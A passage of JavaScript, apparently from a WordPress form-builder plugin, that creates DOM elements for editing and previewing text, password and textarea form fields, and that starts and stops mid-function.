			el_attr_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:3px';
			el_attr_remove.setAttribute("align", 'top');
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_text')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}

		
	var t  = document.getElementById('edit_table');
	
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');
	var br5 = document.createElement('br');
	var br6 = document.createElement('br');
	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);

	edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(Left);
	edit_main_td2_1.appendChild(br2);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(Top);
	
	edit_main_td3.appendChild(el_size_label);
	edit_main_td3_1.appendChild(el_size);
	
	edit_main_td4.appendChild(el_first_value_label);
	edit_main_td4_1.appendChild(el_first_value_input);
	
	edit_main_td5.appendChild(el_style_label);
	edit_main_td5_1.appendChild(el_style_textarea);
	edit_main_td6.appendChild(el_required_label);
	edit_main_td6_1.appendChild(el_required);
				
	edit_main_td8.appendChild(el_unique_label);
	edit_main_td8_1.appendChild(el_unique);
	
	
	edit_main_td7.appendChild(el_attr_label);
	edit_main_td7.appendChild(el_attr_add);
	edit_main_td7.appendChild(br6);
	edit_main_td7.appendChild(el_attr_table);
	edit_main_td7.setAttribute("colspan", "2");

	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);
	edit_main_tr8.appendChild(edit_main_td8);
	edit_main_tr8.appendChild(edit_main_td8_1);
	edit_main_tr7.appendChild(edit_main_td7);
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr3);
	edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr5);
	edit_main_table.appendChild(edit_main_tr6);
	edit_main_table.appendChild(edit_main_tr8);
	edit_main_table.appendChild(edit_main_tr7);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	add_id_and_name(i, 'type_text');
	
//show table

	element='input';	type='text'; 
	var adding_type = document.createElement("input");
            adding_type.setAttribute("type", "hidden");
            adding_type.setAttribute("value", "type_number");
            adding_type.setAttribute("name", i+"_typeform_id_temp");
            adding_type.setAttribute("id", i+"_typeform_id_temp");
	    
	var adding_required= document.createElement("input");
            adding_required.setAttribute("type", "hidden");
            adding_required.setAttribute("value", w_required);
            adding_required.setAttribute("name", i+"_requiredform_id_temp");
            adding_required.setAttribute("id", i+"_requiredform_id_temp");
			
	var adding_unique= document.createElement("input");
            adding_unique.setAttribute("type", "hidden");
            adding_unique.setAttribute("value", w_unique);
            adding_unique.setAttribute("name", i+"_uniqueform_id_temp");
            adding_unique.setAttribute("id", i+"_uniqueform_id_temp");
			
			
	var adding = document.createElement(element);
            adding.setAttribute("type", type);
		
		if(w_title==w_first_val)
		{
			adding.style.cssText = "width:"+w_size+"px;";
			adding.setAttribute("class", "input_deactive");
		}
		else
		{
			adding.style.cssText = "width:"+w_size+"px;";
			adding.setAttribute("class", "input_active");
		}
			adding.setAttribute("id", i+"_elementform_id_temp");
			adding.setAttribute("name", i+"_elementform_id_temp");
			adding.setAttribute("value", w_first_val);
			adding.setAttribute("title", w_title);
			adding.setAttribute("onKeyPress", "return check_isnum_point(event)");
			adding.setAttribute("onFocus", 'delete_value("'+i+'_elementform_id_temp")');
			adding.setAttribute("onBlur", 'return_value("'+i+'_elementform_id_temp")');
			adding.setAttribute("onChange", 'change_value("'+i+'_elementform_id_temp")');
			
	 
     	var div = document.createElement('div');
      	    div.setAttribute("id", "main_div");
					
      	var table = document.createElement('table');
           	table.setAttribute("id", i+"_elemet_tableform_id_temp");
			
      	var tr = document.createElement('tr');
			
      	var td1 = document.createElement('td');
         	td1.setAttribute("valign", 'middle');
         	td1.setAttribute("align", 'left');
           	td1.setAttribute("id", i+"_label_sectionform_id_temp");
			
      	var td2 = document.createElement('td');
        	td2.setAttribute("valign", 'middle');
         	td2.setAttribute("align", 'left');
           	td2.setAttribute("id", i+"_element_sectionform_id_temp");
			
      	var br1 = document.createElement('br');
      	var br2 = document.createElement('br');
     	var br3 = document.createElement('br');
      	var br4 = document.createElement('br');
      

	    
      	var label = document.createElement('span');
			label.setAttribute("id", i+"_element_labelform_id_temp");
			label.innerHTML = w_field_label;
			label.setAttribute("class", "label");
	    
      	var required = document.createElement('span');
			required.setAttribute("id", i+"_required_elementform_id_temp");
			required.innerHTML = "";
			required.setAttribute("class", "required");
	if(w_required=="yes")
			required.innerHTML = " *";
      	var main_td  = document.getElementById('show_table');
      
      	td1.appendChild(label);
      	td1.appendChild(required);
      	td2.appendChild(adding_type);
      	td2.appendChild(adding_required);
      	td2.appendChild(adding_unique);
      	td2.appendChild(adding);
      	tr.appendChild(td1);
      	tr.appendChild(td2);
      	table.appendChild(tr);
      
      	div.appendChild(table);
      	div.appendChild(br3);
      	main_td.appendChild(div);
	if(w_field_label_pos=="top")
				label_top(i);
change_class(w_class, i);
refresh_attr(i, 'type_text');
}

function type_password(i, w_field_label, w_field_label_pos, w_size, w_required, w_unique, w_class, w_attr_name, w_attr_value) {

    document.getElementById("element_type").value="type_password";

	delete_last_child();
// edit table	
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		edit_div.setAttribute("style", "border-top:1px dotted black;padding:10px;  padding-top:0px; padding-bottom:0px; margin-top:10px;");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "0");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
      		edit_main_tr1.setAttribute("valing", "top");
		
	var edit_main_tr2  = document.createElement('tr');
      		edit_main_tr2.setAttribute("valing", "top");
		
	var edit_main_tr3  = document.createElement('tr');
      		edit_main_tr3.setAttribute("valing", "top");
		
	var edit_main_tr4  = document.createElement('tr');
      		edit_main_tr4.setAttribute("valing", "top");
		
	var edit_main_tr5  = document.createElement('tr');
      		edit_main_tr5.setAttribute("valing", "top");
			
	var edit_main_tr6  = document.createElement('tr');
      		edit_main_tr6.setAttribute("valing", "top");

	var edit_main_tr7  = document.createElement('tr');
      		edit_main_tr7.setAttribute("valing", "top");

	var edit_main_td1 = document.createElement('td');
		edit_main_td1.style.cssText = "padding-top:10px";	
	var edit_main_td1_1 = document.createElement('td');
		edit_main_td1_1.style.cssText = "padding-top:10px";
	var edit_main_td2 = document.createElement('td');
		edit_main_td2.style.cssText = "padding-top:10px";
	var edit_main_td2_1 = document.createElement('td');
		edit_main_td2_1.style.cssText = "padding-top:10px";

	var edit_main_td3 = document.createElement('td');
		edit_main_td3.style.cssText = "padding-top:10px";
	var edit_main_td3_1 = document.createElement('td');
		edit_main_td3_1.style.cssText = "padding-top:10px";
		
	var edit_main_td4 = document.createElement('td');
		edit_main_td4.style.cssText = "padding-top:10px";
	var edit_main_td4_1 = document.createElement('td');
		edit_main_td4_1.style.cssText = "padding-top:10px";
		
	var edit_main_td5 = document.createElement('td');
		edit_main_td5.style.cssText = "padding-top:10px";
	var edit_main_td5_1 = document.createElement('td');
		edit_main_td5_1.style.cssText = "padding-top:10px";
				
	var edit_main_td6 = document.createElement('td');
		edit_main_td6.style.cssText = "padding-top:10px";
	var edit_main_td6_1 = document.createElement('td');
		edit_main_td6_1.style.cssText = "padding-top:10px";
		  
	var edit_main_td7 = document.createElement('td');
		edit_main_td7.style.cssText = "padding-top:10px";
	var edit_main_td7_1 = document.createElement('td');
		edit_main_td7_1.style.cssText = "padding-top:10px";
		  
	var el_label_label = document.createElement('label');
		        el_label_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
                el_label_textarea.setAttribute("id", "edit_for_label");
                el_label_textarea.setAttribute("rows", "4");
                el_label_textarea.style.cssText = "width:200px;";
                el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
				el_label_textarea.innerHTML = w_field_label;
		
	var el_label_position_label = document.createElement('label');
			        el_label_position_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_label_position_label.innerHTML = "Field label position";
	
	var el_label_position1 = document.createElement('input');
                el_label_position1.setAttribute("id", "edit_for_label_position_top");
                el_label_position1.setAttribute("type", "radio");
                el_label_position1.setAttribute("value", "left");
                

                el_label_position1.setAttribute("name", "edit_for_label_position");
                el_label_position1.setAttribute("onchange", "label_left("+i+")");
		Left = document.createTextNode("Left");
		
	var el_label_position2 = document.createElement('input');
                el_label_position2.setAttribute("id", "edit_for_label_position_left");
                el_label_position2.setAttribute("type", "radio");
                el_label_position2.setAttribute("value", "top");
	

                el_label_position2.setAttribute("name", "edit_for_label_position");
                el_label_position2.setAttribute("onchange", "label_top("+i+")");
		Top = document.createTextNode("Top");
		
	if(w_field_label_pos=="top")
	
				el_label_position2.setAttribute("checked", "checked");
	else
				el_label_position1.setAttribute("checked", "checked");

	var el_size_label = document.createElement('label');
	        el_size_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_size_label.innerHTML = "Field size(px) ";
	
	var el_size = document.createElement('input');
		   el_size.setAttribute("id", "edit_for_input_size");
		   el_size.setAttribute("type", "text");
		   el_size.setAttribute("value", w_size);
		   
			el_size.setAttribute("name", "edit_for_size");
			el_size.setAttribute("onKeyPress", "return check_isnum(event)");
            el_size.setAttribute("onKeyUp", "change_w_style('"+i+"_elementform_id_temp', this.value)");

	var el_required_label = document.createElement('label');
	        el_required_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_required_label.innerHTML = "Required";
	
	var el_required = document.createElement('input');
                el_required.setAttribute("id", "el_send");
                el_required.setAttribute("type", "checkbox");
                el_required.setAttribute("value", "yes");
                el_required.setAttribute("onclick", "set_required('"+i+"_required')");
	if(w_required=="yes")
			
                el_required.setAttribute("checked", "checked");
			
	var el_unique_label = document.createElement('label');
	    el_unique_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_unique_label.innerHTML = "Allow only unique values";
	
	var el_unique = document.createElement('input');
                el_unique.setAttribute("id", "el_send");
                el_unique.setAttribute("type", "checkbox");
                el_unique.setAttribute("value", "yes");
                el_unique.setAttribute("onclick", "set_unique('"+i+"_uniqueform_id_temp')");
	if(w_unique=="yes")
                el_unique.setAttribute("checked", "checked");
				
	var el_style_label = document.createElement('label');
	        el_style_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
                el_style_textarea.setAttribute("id", "element_style");
		el_style_textarea.setAttribute("type", "text");
		el_style_textarea.setAttribute("value", w_class);
                el_style_textarea.style.cssText = "width:200px;";
                el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");
	var el_attr_label = document.createElement('label');
	                el_attr_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_attr_label.innerHTML = "Additional Attributes";
	var el_attr_add = document.createElement('img');
                el_attr_add.setAttribute("id", "el_choices_add");
           	el_attr_add.setAttribute("src", fmc_plugin_url+'/images/add.png');
            	el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
            	el_attr_add.setAttribute("title", 'add');
                el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_text')");
	var el_attr_table = document.createElement('table');
                el_attr_table.setAttribute("id", 'attributes');
                el_attr_table.setAttribute("border", '0');
        	el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
                el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
            	el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
            	el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
            	el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
	                el_attr_name_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
	                el_attr_value_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
	
			el_attr_name.setAttribute("type", "text");
	
			el_attr_name.style.cssText = "width:100px";
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_text')");
			
		var el_attr_value = document.createElement('input');
	
			el_attr_value.setAttribute("type", "text");
	
			el_attr_value.style.cssText = "width:100px";
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_text')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:3px';
			el_attr_remove.setAttribute("align", 'top');
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_text')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}

	var t  = document.getElementById('edit_table');
	
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');
	var br5 = document.createElement('br');
	var br6 = document.createElement('br');
	
	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);

	edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(Left);
	edit_main_td2_1.appendChild(br2);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(Top);
	
	edit_main_td3.appendChild(el_size_label);
	edit_main_td3_1.appendChild(el_size);
	
	edit_main_td4.appendChild(el_style_label);
	edit_main_td4_1.appendChild(el_style_textarea);
	
	edit_main_td5.appendChild(el_required_label);
	edit_main_td5_1.appendChild(el_required);
	
	edit_main_td7.appendChild(el_unique_label);
	edit_main_td7_1.appendChild(el_unique);

	edit_main_td6.appendChild(el_attr_label);
	edit_main_td6.appendChild(el_attr_add);
	edit_main_td6.appendChild(br3);
	edit_main_td6.appendChild(el_attr_table);
	edit_main_td6.setAttribute("colspan", "2");

	
	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr7.appendChild(edit_main_td7);
	edit_main_tr7.appendChild(edit_main_td7_1);
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr3);
	edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr5);
	edit_main_table.appendChild(edit_main_tr7);
	edit_main_table.appendChild(edit_main_tr6);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	add_id_and_name(i, 'type_text');

//show table

	element='input';	type='password'; 
	var adding_type = document.createElement("input");
            adding_type.setAttribute("type", "hidden");
            adding_type.setAttribute("value", "type_password");
            adding_type.setAttribute("name", i+"_typeform_id_temp");
            adding_type.setAttribute("id", i+"_typeform_id_temp");
	var adding_required= document.createElement("input");
            adding_required.setAttribute("type", "hidden");
            adding_required.setAttribute("value", w_required);
            adding_required.setAttribute("name", i+"_requiredform_id_temp");
            adding_required.setAttribute("id", i+"_requiredform_id_temp");
			
	var adding_unique= document.createElement("input");
            adding_unique.setAttribute("type", "hidden");
            adding_unique.setAttribute("value", w_unique);
            adding_unique.setAttribute("name", i+"_uniqueform_id_temp");
            adding_unique.setAttribute("id", i+"_uniqueform_id_temp");

	var adding = document.createElement(element);
			adding.setAttribute("type", type);
			adding.setAttribute("id", i+"_elementform_id_temp");
			adding.setAttribute("name", i+"_elementform_id_temp");
			adding.style.cssText = "width:"+w_size+"px;";
		
			
     	var div = document.createElement('div');
      	    div.setAttribute("id", "main_div");
		
	var table = document.createElement('table');
           	table.setAttribute("id", i+"_elemet_tableform_id_temp");
			
      	var tr = document.createElement('tr');
			
      	var td1 = document.createElement('td');
         	td1.setAttribute("valign", 'middle');
         	td1.setAttribute("align", 'left');
           	td1.setAttribute("id", i+"_label_sectionform_id_temp");
			
      	var td2 = document.createElement('td');
        	td2.setAttribute("valign", 'middle');
         	td2.setAttribute("align", 'left');
           	td2.setAttribute("id", i+"_element_sectionform_id_temp");

      	var br1 = document.createElement('br');
      	var br2 = document.createElement('br');
     	var br3 = document.createElement('br');
      	var br4 = document.createElement('br');
      
	    
      	var label = document.createElement('span');
			label.setAttribute("id", i+"_element_labelform_id_temp");
			label.innerHTML = w_field_label;
			label.setAttribute("class", "label");
	    
      	var required = document.createElement('span');
			required.setAttribute("id", i+"_required_elementform_id_temp");
			required.innerHTML = "";
			required.setAttribute("class", "required");
	if(w_required=="yes")
			required.innerHTML = " *";
      	var main_td  = document.getElementById('show_table');
	
      
      	td1.appendChild(label);
      	td1.appendChild(required);
      	td2.appendChild(adding_type);
      	td2.appendChild(adding_required);
       	td2.appendChild(adding_unique);
     	td2.appendChild(adding);
      	tr.appendChild(td1);
      	tr.appendChild(td2);
      	table.appendChild(tr);
		
      	div.appendChild(table);
      	div.appendChild(br3);
      	main_td.appendChild(div);
	if(w_field_label_pos=="top")
				label_top(i);
change_class(w_class, i);
refresh_attr(i, 'type_text');
}

function type_textarea(i, w_field_label, w_field_label_pos, w_size_w, w_size_h, w_first_val, w_title, w_required, w_unique, w_class, w_attr_name, w_attr_value){
    
	document.getElementById("element_type").value="type_textarea";

	delete_last_child();
// edit table	
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		edit_div.setAttribute("style", "border-top:1px dotted black;padding:10px;  padding-top:0px; padding-bottom:0px; margin-top:10px;");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "0");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
      		edit_main_tr1.setAttribute("valing", "top");
		
	var edit_main_tr2  = document.createElement('tr');
      		edit_main_tr2.setAttribute("valing", "top");
		
	var edit_main_tr3  = document.createElement('tr');
      		edit_main_tr3.setAttribute("valing", "top");
		
	var edit_main_tr4  = document.createElement('tr');
      		edit_main_tr4.setAttribute("valing", "top");
		
	var edit_main_tr5  = document.createElement('tr');
      		edit_main_tr5.setAttribute("valing", "top");
			
	var edit_main_tr6  = document.createElement('tr');
      		edit_main_tr6.setAttribute("valing", "top");
	var edit_main_tr7  = document.createElement('tr');
      		edit_main_tr7.setAttribute("valing", "top");

	var edit_main_tr8  = document.createElement('tr');
      		edit_main_tr8.setAttribute("valing", "top");

	var edit_main_td1 = document.createElement('td');
		edit_main_td1.style.cssText = "padding-top:10px";	
	var edit_main_td1_1 = document.createElement('td');
		edit_main_td1_1.style.cssText = "padding-top:10px";		
	var edit_main_td2 = document.createElement('td');
		edit_main_td2.style.cssText = "padding-top:10px";
	var edit_main_td2_1 = document.createElement('td');
		edit_main_td2_1.style.cssText = "padding-top:10px";

	var edit_main_td3 = document.createElement('td');
		edit_main_td3.style.cssText = "padding-top:10px";
	var edit_main_td3_1 = document.createElement('td');
		edit_main_td3_1.style.cssText = "padding-top:10px";
	var edit_main_td4 = document.createElement('td');
		edit_main_td4.style.cssText = "padding-top:10px";
	var edit_main_td4_1 = document.createElement('td');
		edit_main_td4_1.style.cssText = "padding-top:10px";
		
	var edit_main_td5 = document.createElement('td');
		edit_main_td5.style.cssText = "padding-top:10px";
	var edit_main_td5_1 = document.createElement('td');
		edit_main_td5_1.style.cssText = "padding-top:10px";
				
	var edit_main_td6 = document.createElement('td');
		edit_main_td6.style.cssText = "padding-top:10px";
	var edit_main_td6_1 = document.createElement('td');
		edit_main_td6_1.style.cssText = "padding-top:10px";

	var edit_main_td7 = document.createElement('td');
		edit_main_td7.style.cssText = "padding-top:10px";
	var edit_main_td7_1 = document.createElement('td');
		edit_main_td7_1.style.cssText = "padding-top:10px";
		  
	var edit_main_td8 = document.createElement('td');
		edit_main_td8.style.cssText = "padding-top:10px";
	var edit_main_td8_1 = document.createElement('td');
		edit_main_td8_1.style.cssText = "padding-top:10px";
		  
	var el_label_label = document.createElement('label');
			        el_label_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
                el_label_textarea.setAttribute("id", "edit_for_label");
                el_label_textarea.setAttribute("rows", "4");
                el_label_textarea.style.cssText = "width:200px;";
                el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
				el_label_textarea.innerHTML = w_field_label;
		
	var el_label_position_label = document.createElement('label');
			        el_label_position_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_label_position_label.innerHTML = "Field label position";
	
	var el_label_position1 = document.createElement('input');
                el_label_position1.setAttribute("id", "edit_for_label_position_top");
                el_label_position1.setAttribute("type", "radio");
                el_label_position1.setAttribute("value", "left");
                

                el_label_position1.setAttribute("name", "edit_for_label_position");
                el_label_position1.setAttribute("onchange", "label_left("+i+")");
		Left = document.createTextNode("Left");
		
	var el_label_position2 = document.createElement('input');
                el_label_position2.setAttribute("id", "edit_for_label_position_left");
                el_label_position2.setAttribute("type", "radio");
                el_label_position2.setAttribute("value", "top");
	

                el_label_position2.setAttribute("name", "edit_for_label_position");
                el_label_position2.setAttribute("onchange", "label_top("+i+")");
		Top = document.createTextNode("Top");
		
	if(w_field_label_pos=="top")
				el_label_position2.setAttribute("checked", "checked");
	else
				el_label_position1.setAttribute("checked", "checked");

	var el_size_label = document.createElement('label');
	        el_size_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_size_label.innerHTML = "Field size(px) ";
		
	var el_size_w = document.createElement('input');
		   el_size_w.setAttribute("id", "edit_for_input_size");
		   el_size_w.setAttribute("type", "text");
		   el_size_w.setAttribute("value", w_size_w);
		   el_size_w.style.cssText = "margin-right:2px; width: 60px";
		   el_size_w.setAttribute("name", "edit_for_size");
		   el_size_w.setAttribute("onKeyPress", "return check_isnum(event)");
           el_size_w.setAttribute("onKeyUp", "change_w_style('"+i+"_elementform_id_temp', this.value)");
		   
		X = document.createTextNode("x");
		
	var el_size_h = document.createElement('input');
		   el_size_h.setAttribute("id", "edit_for_input_size");
		   el_size_h.setAttribute("type", "text");
		   el_size_h.setAttribute("value", w_size_h);
		   el_size_h.style.cssText = "margin-left:2px;  width:60px";
			el_size_h.setAttribute("name", "edit_for_size");
			el_size_h.setAttribute("onKeyPress", "return check_isnum(event)");
            el_size_h.setAttribute("onKeyUp", "change_h_style('"+i+"_elementform_id_temp', this.value)");
	var el_first_value_label = document.createElement('label');
	        el_first_value_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_first_value_label.innerHTML = "Value if empty";
	
	var el_first_value_input = document.createElement('input');
                el_first_value_input.setAttribute("id", "el_first_value_input");
                el_first_value_input.setAttribute("type", "text");
                el_first_value_input.setAttribute("value", w_title);
                el_first_value_input.style.cssText = "width:200px;";
                el_first_value_input.setAttribute("onKeyUp", "change_input_value(this.value,'"+i+"_elementform_id_temp')");
	var el_required_label = document.createElement('label');
	        el_required_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_required_label.innerHTML = "Required";
	
	var el_required = document.createElement('input');
                el_required.setAttribute("id", "el_send");
                el_required.setAttribute("type", "checkbox");
                el_required.setAttribute("value", "yes");
                el_required.setAttribute("onclick", "set_required('"+i+"_required')");
	if(w_required=="yes")
			    el_required.setAttribute("checked", "checked");
		
	var el_unique_label = document.createElement('label');
	    el_unique_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_unique_label.innerHTML = "Allow only unique values";
	
	var el_unique = document.createElement('input');
                el_unique.setAttribute("id", "el_send");
                el_unique.setAttribute("type", "checkbox");
                el_unique.setAttribute("value", "yes");
                el_unique.setAttribute("onclick", "set_unique('"+i+"_uniqueform_id_temp')");
	if(w_unique=="yes")
                el_unique.setAttribute("checked", "checked");
		
	var el_style_label = document.createElement('label');
	        el_style_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
                el_style_textarea.setAttribute("id", "element_style");
				el_style_textarea.setAttribute("type", "text");
				el_style_textarea.setAttribute("value", w_class);
                el_style_textarea.style.cssText = "width:200px;";
                el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");

	var el_attr_label = document.createElement('label');
	                el_attr_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_attr_label.innerHTML = "Additional Attributes";
			
	var el_attr_add = document.createElement('img');
                el_attr_add.setAttribute("id", "el_choices_add");
           	el_attr_add.setAttribute("src", fmc_plugin_url+'/images/add.png');
            	el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
            	el_attr_add.setAttribute("title", 'add');
                el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_text')");
	var el_attr_table = document.createElement('table');
                el_attr_table.setAttribute("id", 'attributes');
                el_attr_table.setAttribute("border", '0');
        	el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
                el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
            	el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
            	el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
            	el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
	                el_attr_name_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
	                el_attr_value_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
	
			el_attr_name.setAttribute("type", "text");
	
			el_attr_name.style.cssText = "width:100px";
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
